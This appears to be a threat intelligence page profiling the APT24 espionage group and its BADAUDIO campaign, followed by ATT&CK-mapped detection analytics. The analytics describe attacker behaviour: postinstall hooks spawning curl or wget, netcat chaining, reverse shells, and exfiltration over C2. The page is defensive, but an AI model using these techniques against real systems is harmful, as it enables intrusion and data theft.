
From Watering Holes to Supply Chains: How APT24 Scales Cyber Espionage with BADAUDIO
Indicators of Compromise
APT Groups1
Summary of Actor:APT24, also known as 'Garden Panda', is a cyber espionage group believed to be operating out of China. The group primarily targets organizations in the aerospace, defense, and energy sectors. APT24 is known for its sophisticated phishing campaigns and the use of custom malware. General Features:APT24 employs a combination of social engineering, spear-phishing, and custom malware to gain access to target networks. They are known for their persistence and ability to remain hidden in compromised networks for extended periods. Related Other Groups: APT1,APT3,APT10 Indicators of Attack (IoA): Use of legitimate tools like PowerShell and Cobalt Strike Spear-phishing emails with malicious attachments Custom malware such as Beacon and HTTPBrowser Recent Activities and Trends: Latest Campaigns : APT24 recently launched a spear-phishing campaign targeting aerospace companies with a new strain of malware designed to exfiltrate sensitive information. The campaign involved the use of malicious Word documents containing macros. Emerging Trends : APT24 has been observed increasing their use of living-off-the-land techniques, utilizing legitimate administrative tools to move laterally within networks. They have also begun to focus more on targeting supply chains in the aerospace and defense sectors.
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
REMEDIATION
T1059.007-JavaScript
ID | Name | Analytic ID | Analytic Description |
Detects JavaScript execution through WSH (wscript.exe, cscript.exe) or HTA (mshta.exe), particularly when spawned from Office macros, web browsers, or abnormal user paths. Correlates script execution with outbound network activity or system modification. | |||
Detects JavaScript for Automation (JXA) via osascript or compiled scripts using OSAKit APIs. Flags execution involving system modification, inter-process scripting, or browser abuse. | |||
Detects Node.js or JavaScript interpreter execution from web shells, cron jobs, or local users. Correlates execution with reverse shell behavior, file modifications, or abnormal outbound connections. |
T1195.001-Compromise Software Dependencies and Development Tools
ID | Name | Analytic ID | Analytic Description |
Supply-chain tamper in dependencies/dev-tools (manager→write/install→first-run→egress) | Adversary manipulates dependencies/dev tools used by developers or CI: a package manager (npm/yarn/pnpm, pip/pipenv, nuget/dotnet, chocolatey/winget, maven/gradle) or a compiler/IDE downloads or restores content; files are written under project paths and execution paths (node_modules, packages, .nuget, .gradle, .m2, %AppData%\npm, %UserProfile%.cargo\bin, temp build dirs). First run of newly written components triggers scripts (preinstall/postinstall), shell/PowerShell spawning, or loader DLLs, followed by network egress to non-approved registries/CDNs. | ||
Developer or CI invokes package managers/compilers (apt/yum + build-essential, npm/yarn/pnpm, pip/pip3, gem, cargo, go, maven/gradle). These write executable or script files into PATH or project dirs and immediately execute embedded lifecycle hooks (preinstall/postinstall, setup.py, npm scripts) that spawn shells or curl/wget, followed by egress to unfamiliar registries or domains. | |||
Developer tools (Homebrew, pip, npm/yarn, Xcode builds) install or update dependencies; new Mach-O or scripts appear under /usr/local, /opt/homebrew, ~/Library/Application Support, project dirs (node_modules/.bin, venv/bin). First run spawns sh/zsh/osascript/curl and new outbound flows; Gatekeeper/AMFI may flag unsigned components. |
T1574.001-DLL
ID | Name | Analytic ID | Analytic Description |
DLL hijacking behaviors including unexpected DLL loads from non-standard directories, replacement of DLLs, phantom DLL insertion, redirection file creation, and substitution of legitimate DLLs. Defender correlates file system modifications, registry changes, and module load telemetry to detect abnormal DLL behavior in trusted processes. |
T1082 - System Information Discovery
ID | Name | Analytic ID | Analytic Description |
Process creation and command-line execution of native system discovery utilities such as systeminfo, hostname, wmic, or use of PowerShell/WMI for system enumeration. | |||
Execution of system enumeration commands such as uname, df, uptime, hostname, lscpu, and cat /etc/os-release through local terminal or scripts. | |||
Execution of system info utilities like systemsetup, sw_vers, uname, or sysctl by terminal or scripted processes. | |||
Execution of esxcli system hostname get, esxcli system version get, or esxcli hardware commands through SSH or local shell. | |||
Use of cloud API calls (e.g., AWS EC2 DescribeInstances, Azure VM Inventory) to enumerate system configurations across assets. | |||
Execution of show version, show hardware, or show system commands through CLI via SSH or console. |
T1059 - Command and Scripting Interpreter
ID | Name | Analytic ID | Analytic Description |
Behavioral Detection of Command and Scripting Interpreter Abuse | Detects the execution of scripting or command interpreters (e.g., powershell.exe, cmd.exe, wscript.exe) outside expected administrative time windows or from abnormal user contexts, often followed by encoded/obfuscated arguments or secondary execution events. | ||
Detects use of shell interpreters (e.g., bash, sh, python, perl) initiated by users or processes not normally executing them, especially when chaining suspicious utilities like netcat, curl, or ssh. | |||
Detects launch of command-line interpreters via Terminal, Automator, or hidden osascript, especially when parent process lineage deviates from user-initiated applications. | |||
Detects use of 'esxcli system' or direct interpreter commands (e.g., busybox shell) invoked from SSH or host terminal unexpectedly. | |||
Identifies CLI interpreter access (e.g., Cisco IOS, Juniper JUNOS) via enable mode or scripting-capable sessions used by uncommon accounts or from unknown IPs. |
T1041 - Exfiltration Over C2 Channel
ID | Name | Analytic ID | Analytic Description |
Identifies suspicious outbound traffic volume mismatches from processes that typically do not generate network activity, particularly over C2 protocols like HTTPS, DNS, or custom TCP/UDP ports, following file or data access. | |||
Monitors for processes reading sensitive files then immediately initiating unusual outbound connections or bulk transfer sessions over persistent sockets, particularly with encrypted or binary payloads. | |||
Detects unauthorized applications or scripts accessing sensitive data followed by establishing encrypted outbound communication to rare external destinations or with abnormal byte ratios. | |||
Detects VMs sending outbound traffic through non-standard services or to unknown destinations. Exfiltration over reverse shells tunneled via VMkernel or custom payloads routed via hostd/vpxa. |
T1189 - Drive-by Compromise
ID | Name | Analytic ID | Analytic Description |
Drive-by Compromise — Behavior-based, Multi-platform Detection Strategy (T1189) | Correlated evidence of anomalous browser/network behavior (suspicious external resource fetches and script injection patterns) followed by atypical child processes, ephemeral execution contexts, memory modification or process injection, and unexpected file drops. Defender sees network requests to previously unseen/suspicious domains or resources + browser process spawning unusual children or loading unsigned modules + file writes or registry changes shortly after those requests. | ||
Correlated evidence of browser or webview fetches to uncommon domains or mutated JS resources (proxy/NGFW logs + Zeek/HTTP logs) followed by unexpected interpreters or script engines executing (python, ruby, sh) spawned from browser processes or user sessions, rapid on-disk staging in /tmp, and outbound connections that deviate from baseline. Defender sees: uncommon resource fetch → short-lived child process executions from user browser context → file writes in temp directories → anomalous outbound C2-like connections. | |||
Correlated evidence where Safari/Chrome/WebKit-based processes issue network requests for uncommon or obfuscated JS resources followed by spawning of script interpreters, launchd or ad-hoc binaries, unusual child processes, or dynamic library loads into browser processes. Defender sees: proxy/HTTP logs with suspicious resource content + unifiedlogs/ASL showing browser/plugin crashes or extension loads + process events indicating child process creation and file writes to /var/folders or /tmp shortly after the fetch. | |||
Post-compromise identity & session anomalies that follow a drive-by compromise: token reuse from new/unfamiliar IPs, anomalous sign-in patterns for previously inactive users, unexpected consent/grant events, or provisioning changes. Defender sees an endpoint/browser compromise (network + endpoint signals) followed by unusual IdP events: new refresh token issuance, consent/consent-grant events, odd MFA bypass patterns, or unusual OAuth client registrations. |
T1105 - Ingress Tool Transfer
ID | Name | Analytic ID | Analytic Description |
Unusual or uncommon processes initiate network connections to external destinations followed by file creation (tools downloaded). | |||
Shell-based tools (curl, wget, scp) initiate connections to external domains followed by creation of executable files on disk. | |||
Process execution of curl or wget followed by a network connection and a file created in temporary or user-specific directories. | |||
Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories. | |||
Network device logs show anomalous inbound file transfers or uncharacteristic flows with high payload volume to network devices with storage or automation hooks. |